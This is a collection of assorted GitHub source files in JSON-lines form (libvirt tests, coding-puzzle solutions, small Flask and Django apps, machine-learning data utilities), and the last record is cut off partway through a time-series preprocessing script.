+{"seq_id":"30435942279","text":"from avocado.utils import cpu\n\nfrom virttest import libvirt_cgroup\nfrom virttest import libvirt_version\nfrom virttest import utils_misc\nfrom virttest import virsh\n\nfrom virttest.libvirt_xml import vm_xml\nfrom virttest.utils_test import libvirt\n\n\ndef set_cpu_state(operate_cpu, set_value):\n \"\"\"\n Set cpu online or offline\n\n :params: operate_cpu: specific cpu index\n :params: set_value: 1 for online, 0 for offline\n \"\"\"\n if set_value == \"0\":\n cpu.online(operate_cpu)\n elif set_value == \"1\":\n cpu.offline(operate_cpu)\n\n\ndef run(test, params, env):\n \"\"\"\n Verify numa tuned guest vm is not affected when cpu is offline\n \"\"\"\n\n def setup_test():\n \"\"\"\n Prepare init xml\n \"\"\"\n numa_info = utils_misc.NumaInfo()\n online_nodes = numa_info.get_online_nodes_withmem()\n test.log.debug(\"Get online node with memory:%s\", online_nodes)\n\n node_cpus = numa_info.get_all_node_cpus()[\n online_nodes[offline_node_index]].strip().split(' ')\n\n params.update({'nodeset': online_nodes[nodeset_index]})\n params.update({'off_cpu': node_cpus[cpu_index]})\n set_cpu_state(params.get('off_cpu'), offline)\n is_cgroupv2 = libvirt_cgroup.CgroupTest(None).is_cgroup_v2_enabled()\n if not is_cgroupv2:\n test.log.debug(\"Need to keep original value in cpuset file under \"\n \"cgroup v1 environment for later recovery\")\n default_cpuset = libvirt_cgroup.CgroupTest(None).\\\n get_cpuset_cpus(vm_name)\n params.update({'default_cpuset': default_cpuset})\n\n def run_test():\n \"\"\"\n Start vm and check result\n \"\"\"\n test.log.info(\"TEST_STEP1: Set hugepage and guest boot \")\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n vm_attrs_new = eval(vm_attrs % params['nodeset'])\n vmxml.setup_attrs(**vm_attrs_new)\n\n result = virsh.define(vmxml.xml, debug=True, ignore_status=True)\n if libvirt_version.version_compare(9, 4, 0) and \\\n tuning == \"restrictive\" and binding == \"guest\":\n libvirt.check_result(result, expected_fails=err_msg,\n check_both_on_error=True)\n return\n else:\n libvirt.check_exit_status(result)\n\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n test.log.debug(\"The new xml is:\\n%s\", vmxml)\n\n test.log.info(\"TEST_STEP2: Start vm\")\n vm.start()\n\n def teardown_test():\n \"\"\"\n Clean data.\n \"\"\"\n test.log.info(\"TEST_TEARDOWN: Clean up env.\")\n bkxml.sync()\n is_cgroupv2 = libvirt_cgroup.CgroupTest(None).is_cgroup_v2_enabled()\n if not is_cgroupv2:\n test.log.debug(\"Reset cpuset file under cgroup v1 environment\")\n libvirt_cgroup.CgroupTest(None).set_cpuset_cpus(\n params['default_cpuset'], vm_name)\n\n vm_name = params.get(\"main_vm\")\n vm = env.get_vm(vm_name)\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n bkxml = vmxml.copy()\n\n vm_attrs = params.get(\"vm_attrs\")\n nodeset_index = int(params.get('nodeset_index'))\n offline_node_index = int(params.get('offline_node_index'))\n cpu_index = int(params.get('cpu_index'))\n offline = params.get(\"offline\")\n err_msg = params.get(\"err_msg\")\n tuning = params.get(\"tuning\")\n binding = params.get(\"binding\")\n\n try:\n setup_test()\n run_test()\n\n finally:\n teardown_test()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/numa/guest_numa_node_tuning/numa_mem_binding_with_offline_cpu.py","file_name":"numa_mem_binding_with_offline_cpu.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"4083279272","text":"'''\nhttps://leetcode-cn.com/problems/max-value-of-equation/\n1499. 满足不等式的最大值\n'''\nfrom typing import List\n\nclass Solution:\n def findMaxValueOfEquation(self, points: List[List[int]], k: int) -> int:\n '''\n 坐标 x 的值从小到大排序\n premin/max\n 求 y[i] + y[j] +|x[i]-x[j]| 最大,且 |x[i]-x[j]| <=k\n i > j => y[i] + x[i] + y[j] - x[j]\n 维护一个y[j] - x[j] 的递减队列,\n '''\n ans = -1e9\n \n '''\n queue : 上界:x[j] >= x[i]-k\n 下界:j<=i-1\n '''\n q = []\n for i, p in enumerate(points):\n # 清除不符合条件的队列内容 x2-x1 > k两点间距离>k\n while q and points[q[0]][0] < p[0]-k:\n q.pop(0) # pop 左侧pop\n\n # ans = max(ans, y[i] + x[i] + y[j] - x[j])\n if q:\n x = points[q[0]]\n ans = max(ans, p[1] + p[0] + x[1]-x[0])\n \n '''\n 维护queue单调性是 y[j]-x[j]的递减队列\n 如果当前队列中y-x < 当前y-x就去除掉\n '''\n while q and \\\n points[q[-1]][1] - points[q[-1]][0] <= p[1]-p[0]:\n q.pop() # 右侧pop y1-x1 < y-x \n q.append(i) # 把当前点加入到队尾\n return ans\n","repo_name":"zhuangzhi/leetcode","sub_path":"week7/le1499.py","file_name":"le1499.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27266016694","text":"from pathlib import Path\nfrom collections import deque\nfrom typing import Optional\n\ndir_path = Path(__file__).resolve().parent\nwith open(f\"{dir_path}/day10_input.txt\") as file:\n data = file.read().splitlines()\n\n\ndef cycle(input: list[str]) -> list[int]:\n stack = deque()\n for line in input:\n if \"noop\" in line:\n stack.append(None)\n else:\n _, val = line.split(\" \")\n stack.append(int(val))\n cycle, X = 0, 1\n cycles = list()\n while len(stack) > 0:\n register = stack.popleft() if stack else None\n if register:\n cycles.append(X)\n cycles.append(X)\n X += register\n else:\n cycles.append(X)\n return cycles\n\n\ndef calculate_signals(cycles: list[int]) -> list[tuple[int, int]]:\n return [\n (cycles[x], (x + 1) * cycles[x])\n for x in range(len(cycles))\n if x + 1 in {20, 60, 100, 140, 180, 220}\n ]\n\n\ndef draw_sprite(cycles: list[int]) -> None:\n for x in range(0, 240, 40):\n draw_line(cycles[x : x + 40])\n\n\ndef draw_line(cycles: list[int]) -> None:\n line = \"\"\n for i, idx in enumerate(cycles):\n if i in [idx-1, idx, idx+1]:\n line+='#'\n else:\n line+='.'\n print(line)\n\ncycles = cycle(data)\n\nsignals = calculate_signals(cycles)\nprint(sum([y for x, y in signals]))\n\ndraw_sprite(cycles)\n","repo_name":"neil-sriv/advent_of_code","sub_path":"2022/completed/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7161080310","text":"__author__ = 'jason.parent@carneylabs.com (Jason Parent)'\n\n# Django imports...\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url\n\nurlpatterns = patterns('users.views',\n url(r'^$', 'home_view', name='home'),\n url(r'^list/$', 'list_view', name='list'),\n url(r'^requests/$', 'requests_view', name='requests'),\n url(r'^friends/$', 'friends_view', name='friends'),\n url(r'^friends/(?P\\d+)/add/$', 'add_view', name='add'),\n url(r'^friends/(?P\\d+)/accept/$', 'accept_view', name='accept'),\n url(r'^friends/(?P\\d+)/reject/$', 'reject_view', name='reject'),\n url(r'^feed/$', 'feed_view', name='feed'),\n)","repo_name":"ParentJA/friends_with_recipes","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14273687788","text":"# this activity will allow encryption and decryption of vowels only.\n\n# define when to stop\n\nuser_stop = False\n\n# simple greeting!\nprint(\"Hi there! I am PyCipher-Simple! I only encrypt and decrypt vowels.\")\n\nwhile user_stop == False:\n\n # ask user to input an encrypted statement.\n encrypted = input(\"Indicate whether you wish to 'encrypt', 'decrypt', or 'stop' the program: \")\n\n # check if the user wanted to stop\n\n if encrypted.lower() == \"stop\":\n\n #set the initial variable to True to break the loop\n\n user_stop = True\n\n # say goodbye!\n \n print(\"Goodbye and hope to see you again!\")\n \n #encoder\n if encrypted.lower() == \"encrypt\":\n #ask for word to encrypt\n to_encrypt = input(\"You have chosen 'encrypt'! Please type the message to encode: \")\n\n #replace every vowel with the equivalent cipher symbol.\n first_vowel = to_encrypt.replace('a', '*')\n second_vowel = first_vowel.replace('e', '&')\n third_vowel = second_vowel.replace('i', '#')\n fourth_vowel = third_vowel.replace('o', '+')\n encrypt_final = fourth_vowel.replace('u', '!')\n\n #print the result!\n print(\"Original text: \", to_encrypt)\n print(\"Encrypted version: \", encrypt_final)\n\n if encrypted.lower() == \"decrypt\":\n # ask for word to decrypt\n todecypt = input(\"You have chosen 'decrypt'! Please type the message to decode: \")\n\n # attempt to replace every encrypted symbol with an appropriate equivalent.\n first_vowel = todecypt.replace('*', 'a')\n second_vowel = first_vowel.replace('&', 'e')\n third_vowel = second_vowel.replace('#', 'i')\n fourth_vowel = third_vowel.replace('+', 'o')\n final_decrypted = fourth_vowel.replace('!', 'u')\n\n # print the decrypted message in low caps\n print(\"The encrypted message is: \", todecypt)\n print(\"The decrypted message is: \", final_decrypted.lower())","repo_name":"EnzoPinon/Py-cipher","sub_path":"pycipher-simple.py","file_name":"pycipher-simple.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72651835740","text":"# LeetCode 200. Number of Island\n# https://leetcode.com/problems/number-of-islands/\n\n# 섬의 갯수를 세는 문제 (DFS)\n\n# Runtime : 415ms(76.39%)\n# Memory Usage : 16.9MB (6.67%)\n\n# if not grid : return 0 추가하면 속도 훨씬 빨라짐.\n\nclass Solution: \n def numIslands(self, grid: List[List[str]]) -> int:\n answer = 0\n for y in range(len(grid)): # len(grid) -> grid의 원소 갯수 4 출력 0~3\n for x in range(len(grid[0])): # 여기서 len(grid[0])면 5가 출력 0~4\n if grid[y][x] == '1': # grid[y][x]의 값이 1일 경우 answer 1씩 가산 \n self.count(y,x,grid) # 그 후 상하좌우 1값지우는 재귀함수\n answer +=1\n \n return answer\n \n def count(self, y, x, grid):\n if y < 0 or x < 0 or y >= len(grid) or x >= len(grid[0]) or grid[y][x] != '1':\n return\n grid[y][x] = '#'\n self.count(y+1,x,grid) # 상\n self.count(y-1,x,grid) # 하\n self.count(y,x-1,grid) # 좌\n self.count(y,x+1,grid) # 우","repo_name":"Leepilung/Algorithm_Study","sub_path":"LeetCode/medium/200.py","file_name":"200.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15404846237","text":"import cv2\n\nindex = 0\nframes = []\n\nwhile True:\n cap = cv2.VideoCapture(index)\n if not cap.read()[0]:\n break\n else:\n print(f\"Camera Device {index}: OK\")\n\n index += 1\n\nwhile True:\n index = 0\n frames = []\n\n # Capture frames from all connected cameras\n while True:\n cap = cv2.VideoCapture(index)\n if not cap.read()[0]:\n break\n ret, frame = cap.read()\n frames.append(frame)\n index += 1\n\n # Concatenate frames horizontally and display the result\n if frames:\n result = cv2.hconcat(frames)\n cv2.imshow(\"Video Feed\", result)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\ncv2.destroyAllWindows()\n","repo_name":"shri-vibhor-sharma/python-apps","sub_path":"video-cam-feed.py","file_name":"video-cam-feed.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72076745181","text":"import pandas as pd\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom recommender import params, simple_search, keyword_search\nfrom prepare import gen_sim_matrix\n\napp = Flask(__name__)\nCORS(app)\ndf = None\ncosine_func = None\n\n\n@app.route('/', methods=['GET'])\ndef entry():\n return jsonify(message='Ready')\n\n\n@app.route('/simple', methods=['GET'])\ndef simple():\n cuisine = request.args.get('cuisine', params['cuisine'])\n price = request.args.get('price', params['price'])\n city = request.args.get('city', params['city'])\n\n print('Simple search for: ', cuisine, price, city)\n\n results = simple_search(df, cuisine=cuisine, price=price, city=city)\n return jsonify(results)\n\n\n@app.route('/keyword', methods=['GET'])\ndef keyword():\n searchword = request.args.get('name', '')\n\n if searchword == '':\n return jsonify(message='Provide a restaurant name.')\n\n print('Keyword search for: ', searchword)\n\n results = keyword_search(df, cosine_func, searchword)\n return jsonify(results)\n\n\nif __name__ == '__main__':\n print('Loading dataset.')\n df = pd.read_pickle('./data/dataset.pkl')\n print('Generating sim matrix')\n cosine_func = gen_sim_matrix(df)\n app.run(host='0.0.0.0', port=80)\n","repo_name":"hmatalonga/restaurant-recommender-system","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29399934453","text":"from dotmap import DotMap\nfrom torch import nn\nfrom torch.optim import Adam\nimport torch\n\nfrom torch_utils import empirical_kl\nfrom trainers.modify_mnist_trainer import ModifyMNISTTrainer\nfrom data.modify_mnist_data import MNISTData\nfrom models.lenet5 import lenet5\n\nconfig = DotMap()\nconfig.seed = 1234\n\nconfig.trainer = ModifyMNISTTrainer\nconfig.tp.epochs = 5\nconfig.tp.log_train_every = 1000\nconfig.tp.loss = nn.NLLLoss()\nconfig.tp.teacher_loss = nn.NLLLoss()\nconfig.tp.student_loss = nn.NLLLoss()\nconfig.tp.test_loss = nn.NLLLoss() \nconfig.tp.use_gpu = True\nconfig.tp.device = torch.device('cuda') if config.tp.use_gpu else torch.device('cpu')\n\nconfig.opt = Adam\nconfig.op.lr = 1e-3\n\nconfig.dataset = MNISTData\nconfig.dp.device = config.tp.device\nconfig.dp.seed = config.seed\nconfig.dp.batch_size = 128\nconfig.dp.resolution = (28, 28)\nconfig.dp.num_classes = 10\n\nconfig.teacher.model = lenet5\nconfig.teacher.device = config.tp.device\nconfig.teacher.input_size = config.dp.resolution[0] * config.dp.resolution[1]\nconfig.teacher.output_size = config.dp.num_classes\nconfig.teacher.activation = nn.ReLU()\nconfig.teacher.output_activation= nn.LogSoftmax(dim=1)\n\nconfig.student.model = lenet5\nconfig.student.device = config.tp.device\nconfig.student.input_size = config.dp.resolution[0] * config.dp.resolution[1]\nconfig.student.output_size = config.dp.num_classes\nconfig.student.activation = nn.ReLU()\nconfig.student.output_activation= nn.LogSoftmax(dim=1)\n","repo_name":"ayushkamat/eecs_229a_final_project","sub_path":"configs/modify_mnist.py","file_name":"modify_mnist.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"18500630174","text":"import random\n\n\ndef calculate_key(_, __):\n array_for_key_computation = [3, 7, 2, 4, 10, 3, 5, 9, 4, 6, 8]\n key_summa = 0\n for ___ in __:\n key_summa += int(___) * array_for_key_computation[_]\n _ += 1\n ____ = key_summa - (key_summa // 11) * 11\n if ____ < 10:\n __.append(str(____))\n else:\n __.append(str(____ - (____ // 10) * 10))\n return __\n\n\ndef create_inn_without_keys(_):\n __ = []\n for i in range(0, _):\n __.append(str(random.randint(0, 9)))\n return __\n\n\ndef create_russian_random_inn(characters=10):\n \"\"\"\n :param characters: 10 - organization, 12 - IP\n :return: valid inn\n \"\"\"\n if characters == 10:\n valid_inn = calculate_key(2, create_inn_without_keys(9))\n else:\n valid_inn = calculate_key(0, calculate_key(1, create_inn_without_keys(10)))\n return ''.join(valid_inn)\n","repo_name":"GrigoriiLikhachev/createJsonSchema","sub_path":"create_russian_random_inn.py","file_name":"create_russian_random_inn.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32928275652","text":"def primeNumber(n):\n \n if n>0:\n count = 0\n j=2\n while j<=n:\n if n%j == 0:\n count+=1\n j+=1\n if count==1:\n return True\n elif n<0:\n count = 0\n j=-2\n while j>=n:\n if n%j == 0:\n count+=1\n j-=1\n if count==1:\n return True\n\n\n return False\n\ndef generateDude(num1,num2):\n li = []\n for i in range(num1,num2):\n if primeNumber(i):\n li.append(i)\n return abs(min(li)+max(li))\n\n\n\ndef main():\n num1, num2 = map(int, input().split(\" \"))\n if num1 < num2:\n otp = generateDude(num1,num2)\n print(otp)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"omkumar01/placement-practice-material","sub_path":"problem_otp.py","file_name":"problem_otp.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32630815506","text":"'''test Flask'''\n\nfrom flask import Flask, render_template, redirect, url_for\nfrom flask_bootstrap import Bootstrap\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import DataRequired\n\nfrom app import translate, generate\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'completely_unique_secret_keyZfAb'\n\nBootstrap(app)\n\nclass TranslateForm(FlaskForm):\n name = StringField('Insert your Shakespearean English here', validators=[DataRequired()])\n submit = SubmitField('Translate')\n\nclass PromptForm(FlaskForm):\n name = StringField('Insert your Shakespearean prompt here', validators=[DataRequired()])\n submit = SubmitField('Generate text')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/translator', methods=['GET', 'POST'])\ndef translator():\n translate_form = TranslateForm()\n\n original = ''\n translation = ''\n\n if translate_form.validate_on_submit():\n original = translate_form.name.data\n translation = translate(original)\n\n return render_template(\n 'translator.html',\n form=translate_form,\n original=original,\n translation=translation,\n )\n\n@app.route('/generator', methods=['GET', 'POST'])\ndef generator():\n prompt_form = PromptForm()\n\n prompt = ''\n generation = ''\n\n if prompt_form.validate_on_submit():\n prompt = prompt_form.name.data\n generation = generate(prompt)\n\n return render_template(\n 'generator.html',\n form=prompt_form,\n prompt=prompt,\n generation=generation\n )\n\n","repo_name":"landonwork/hackusu","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"4947966320","text":"\n\"\"\"Utilities for downloading data , tokenizing, vocabularies.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport gzip\nimport os\nimport re\nimport tarfile\n\nfrom six.moves import urllib\n\nfrom tensorflow.python.platform import gfile\n\n# Special vocabulary symbols - we always put them at the start.\n_PAD = b\"_PAD\"\n_GO = b\"_GO\"\n_EOS = b\"_EOS\"\n_UNK = b\"_UNK\"\n_START_VOCAB = [_PAD, _GO, _EOS, _UNK]\n\nPAD_ID = 0\nGO_ID = 1\nEOS_ID = 2\nUNK_ID = 3\n\n# Regular expressions used to tokenize.\n_CHAR_SPLIT = re.compile(b\"([.,!?\\\"':;)(])\")\n_DIGIT_RE = re.compile(br\"\\d\")\n\n\ndef maybe_download(directory, filename, url):\n \"\"\"Download filename from url unless it's already in directory.\"\"\"\n if not os.path.exists(directory):\n print(\"Creating directory %s\" % directory)\n os.mkdir(directory)\n filepath = os.path.join(directory, filename)\n if not os.path.exists(filepath):\n print(\"Downloading %s to %s\" % (url, filepath))\n filepath, _ = urllib.request.urlretrieve(url, filepath)\n statinfo = os.stat(filepath)\n print(\"Succesfully downloaded\", filename, statinfo.st_size, \"bytes\")\n return filepath\n\n\ndef gunzip_file(gz_path, new_path):\n \"\"\"Unzips from gz_path into new_path.\"\"\"\n print(\"Unpacking %s to %s\" % (gz_path, new_path))\n with gzip.open(gz_path, \"rb\") as gz_file:\n with open(new_path, \"wb\") as new_file:\n for line in gz_file:\n new_file.write(line)\n\n\ndef get_rev_enhn_train_set(directory):\n \"\"\"Check whether training files exist\"\"\"\n print(directory)\n train_path = os.path.join(directory, \"train\")\n if not (gfile.Exists(train_path +\".hn\") and gfile.Exists(train_path +\".en\")):\n raise ValueError(\"Training files %s not found.\", train_path)\n return train_path\n\n\ndef get_rev_enhn_dev_set(directory):\n \"\"\"Check whether Development files exist.\"\"\"\n dev_name = \"valid\"\n dev_path = os.path.join(directory, dev_name)\n if not (gfile.Exists(dev_path + \".hn\") and gfile.Exists(dev_path + \".en\")):\n raise ValueError(\"Development files %s not found.\", dev_path)\n return dev_path\n\n\ndef basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the word into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(re.split('_', space_separated_fragment))\n list1 = [w for w in words if w]\n return list1\n\n\ndef create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=False):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"rb\") as f:\n counter = 0\n for line in f:\n counter += 1\n if counter % 10000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, b\"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n print (vocab)\n print (\".................\")\n print (vocab.get)\n sorted(vocab, key=vocab.get, reverse=True)\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")\n\n\ndef 
initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)\n\n\ndef word_to_token_ids(word, vocabulary,\n tokenizer=None, normalize_digits=False):\n \n if tokenizer:\n chars = tokenizer(word)\n else:\n chars = basic_tokenizer(word)\n if not normalize_digits:\n return [vocabulary.get(w, UNK_ID) for w in chars]\n # Normalize digits by 0 before looking chars up in the vocabulary.\n return [vocabulary.get(re.sub(_DIGIT_RE, b\"0\", w), UNK_ID) for w in chars]\n\n\ndef data_to_token_ids(data_path, target_path, vocabulary_path,\n tokenizer=None, normalize_digits=False):\n if not gfile.Exists(target_path):\n print(\"Tokenizing data in %s\" % data_path)\n vocab, _ = initialize_vocabulary(vocabulary_path)\n with gfile.GFile(data_path, mode=\"rb\") as data_file:\n with gfile.GFile(target_path, mode=\"w\") as tokens_file:\n counter = 0\n for line in data_file:\n counter += 1\n if counter % 10000 == 0:\n print(\" tokenizing line %d\" % counter)\n token_ids = word_to_token_ids(line, vocab, tokenizer,\n normalize_digits)\n tokens_file.write(\" \".join([str(tok) for tok in token_ids]) + \"\\n\")\n\n\ndef prepare_rev_data(data_dir, en_vocabulary_size, hn_vocabulary_size, tokenizer=None):\n \n # Get REV data to the specified directory.\n train_path = get_rev_enhn_train_set(data_dir)\n dev_path = get_rev_enhn_dev_set(data_dir)\n\n # Create vocabularies of the appropriate sizes.\n hn_vocab_path = os.path.join(data_dir, \"vocab%d.hn\" % hn_vocabulary_size)\n en_vocab_path = os.path.join(data_dir, \"vocab%d.en\" % en_vocabulary_size)\n create_vocabulary(hn_vocab_path, train_path + \".hn\", hn_vocabulary_size, tokenizer)\n create_vocabulary(en_vocab_path, train_path + \".en\", en_vocabulary_size, tokenizer)\n\n # Create token ids for the training data.\n hn_train_ids_path = train_path + (\".ids%d.hn\" % hn_vocabulary_size)\n en_train_ids_path = train_path + (\".ids%d.en\" % en_vocabulary_size)\n data_to_token_ids(train_path + \".hn\", hn_train_ids_path, hn_vocab_path, tokenizer)\n data_to_token_ids(train_path + \".en\", en_train_ids_path, en_vocab_path, tokenizer)\n\n # Create token ids for the development data.\n hn_dev_ids_path = dev_path + (\".ids%d.hn\" % hn_vocabulary_size)\n en_dev_ids_path = dev_path + (\".ids%d.en\" % en_vocabulary_size)\n data_to_token_ids(dev_path + \".hn\", hn_dev_ids_path, hn_vocab_path, tokenizer)\n data_to_token_ids(dev_path + \".en\", en_dev_ids_path, en_vocab_path, tokenizer)\n\n return (en_train_ids_path, hn_train_ids_path,\n en_dev_ids_path, hn_dev_ids_path,\n en_vocab_path, hn_vocab_path)\n","repo_name":"shikha369/Seq2SeqTransliteration","sub_path":"base code/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42857552592","text":"def get_appliance_disk_information(\n self,\n ne_id: str,\n) -> dict:\n \"\"\"Get disk information from appliance\n\n .. list-table::\n :header-rows: 1\n\n * - Swagger Section\n - Method\n - Endpoint\n * - disks\n - GET\n - /configReportDisk/{neId}\n\n :param ne_id: Appliance id in the format of integer.NE e.g. ``3.NE``\n :type ne_id: str\n :return: Returns dictionary of disk information \\n\n * keyword **disks** (`dict`): Dictionary of disks in Edge\n Connect appliance. Disks are identified by numeric strings,\n e.g. ``\"0\"``\n * keyword **controller** (`dict`): Dictionary of controller\n information\n * keyword **diskImage** (`str`): Filename of disk image\n :rtype: dict\n \"\"\"\n return self._get(\"/configReportDisk/{}\".format(ne_id))\n","repo_name":"SPOpenSource/edgeconnect-python","sub_path":"pyedgeconnect/orch/_disks.py","file_name":"_disks.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"42979942211","text":"import os\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler \nfrom sklearn.metrics import roc_auc_score\n\n# Thresholds \nTOTAL_THRES = 270\nMIDDLE_THRES = 210\nSTATUS_THRES = 20\n\n# Required directory paths\ndata_dir = '/opt/ml/code/input/train.csv'\nmodel_dir = '/opt/ml/model'\n\n\ndef generate_label_status(df_original, target_date, status_thres=STATUS_THRES):\n \"\"\" Labeling based on whether customer purchase at target date(month)\n This label dosen't care about whether he will buy more than $300(TOTAL_THRES)\n\n Args:\n df_original (pd.DataFrame): monthly frame\n target_date (str): date to apply prediction\n status_thres (int): threshold to consider as 'purchased'\n \n Returns:\n purchase status label (0/1) on target date\n \"\"\"\n\n df = df_original.copy()\n\n label_values = df[target_date]\n label = (label_values > status_thres).astype(int)\n label = label.sort_index().to_frame(name='status_label').reset_index()\n\n return label\n\n\ndef generate_label_total(df_original, middle_thres=MIDDLE_THRES, total_thres=TOTAL_THRES, status_thres=STATUS_THRES):\n \"\"\" Calculate consumption expectations of each customer based on average consumption history\n\n https://stats.stackexchange.com/questions/135061/best-method-for-short-time-series\n Averaging is one of the strongest method. ㅇ _ㅇ\n\n Args:\n df_original (pd.DataFrame): monthly frame\n middle_thres (int): if 'middle_thres < expectation < total_thres' is true, apply 0.5\n total_thres (int): if 'expectation > total_thres' is true, apply 1.0\n status_thres (int): Averaging only above status_thres\n \n Returns:\n purchase total label (0/0.5/1) on target date\n \"\"\"\n\n df = df_original.copy()\n label = df[df > status_thres].mean(axis=1)\n label[label < middle_thres] = 0\n label[(label > middle_thres) & (label < total_thres)] = 0.5\n label[label >= total_thres] = 1\n label = label.sort_index().to_frame(name='total_label').reset_index()\n\n return label\n\n\ndef generate_monthly_frame(df_original, categories):\n \"\"\" Generate monthly purchase data calculated for each customer\n\n Args:\n df_original (pd.DataFrame): DataFrame dropped with unnecessary columns\n categories (list[str]): numerical categories to be aggregated\n\n Returns:\n monthly frame\n \n ex)\n ym 2009-12 2010-01 ... 2011-10 2011-11 \n customer_id \n 12346 187.2750 -22.275 ... 0.000 0.0000 \n 12349 -39.8475 0.000 ... 1763.058 330.0000 \n ... ... ... ... ... ... \n 18286 763.8675 0.000 ... 0.000 0.0000 \n 18287 -8.4150 0.000 ... 0.000 1768.1565 \n\n \"\"\"\n\n df = df_original.copy()\n\n # -- groupby / pivot_table\n df = df.groupby(['customer_id', 'ym'])[categories].sum().reset_index()\n monthly_frame = pd.pivot_table(data=df,\n values=categories,\n index='customer_id',\n columns='ym',\n fill_value=0)\n\n return monthly_frame\n\n\ndef time_series_processing(df_original, categories, train=True):\n \"\"\" Generate features that reflect the characteristics of time series data.\n In this function, SUM and SKEW will be applied to each specified time period.\n\n - Seasonality(Continuity): The person who bought recently will buy again\n 1. Last 10 months | 2. Last 7 months | 3. Last 4 months \n\n - Cyclicity(Periodicity): People buy things regularly\n 1. two-months interval | 2. three-months interval | 3. 
annually(1 year interval)\n\n - Weak-Cyclicity: The person who bought last year will buy again at near month\n - Around last year's target month\n\n Args:\n df_original (pd.DataFrame): monthly frame\n categories (list[str]): aggregated categories\n train (bool): True if df_original is train data\n\n Returns:\n Specialized time series data\n \"\"\"\n \n df = df_original.copy()\n \n # -- Declare period list that reflect each attribute\n if train:\n target_date = '2011-11'\n\n # -- seasonality\n seasons1 = ['2011-01', '2011-02', '2011-03', '2011-04', '2011-05', '2011-06', '2011-07', '2011-08', '2011-09', '2011-10']\n seasons2 = ['2011-04', '2011-05', '2011-06', '2011-07', '2011-08', '2011-09', '2011-10']\n seasons3 = ['2011-07', '2011-08', '2011-09', '2011-10']\n\n # -- cyclicity\n cycle1 = ['2011-01', '2011-03', '2011-05', '2011-07', '2011-09']\n cycle2 = ['2010-08', '2010-11', '2011-02', '2011-05', '2011-08']\n cycle3 = ['2010-11']\n\n # -- weak-periodicity\n weak_cycle = ['2009-12', '2010-10', '2010-11', '2010-12']\n\n else: \n target_date = '2011-12'\n \n # 